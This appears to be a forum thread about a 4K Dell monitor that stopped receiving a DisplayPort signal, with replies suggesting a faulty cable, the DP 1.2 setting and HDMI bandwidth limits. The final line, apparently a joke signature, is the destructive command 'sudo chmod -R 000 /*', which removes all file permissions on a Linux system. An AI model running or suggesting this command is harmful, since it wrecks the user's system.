4K display not recognising display port.

I use a 4K Dell monitor with DP with my desktop, i changed over to a 1080p display still using DP for a bit and when i changed back then suddenly the display wouldnt get a signal using the DP cable. And when i use HDMI with the 4K monitor i either have to use it with 30hz 4K, or downscale it to 1080p with 60hz (windows’ downscaling looks horrible though). I have tried the DP with other display and it works just fine and i have updated my AMD graphics drivers. Still no signal with the 4K display though.

could be a bad display cable even if it works with other 1080p monitors.

either way that cable is likely to be at fault if the display works with an HDMI

Did you set it to displayport 1.2 in the menus?

Only if it's HDMI 2.0

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
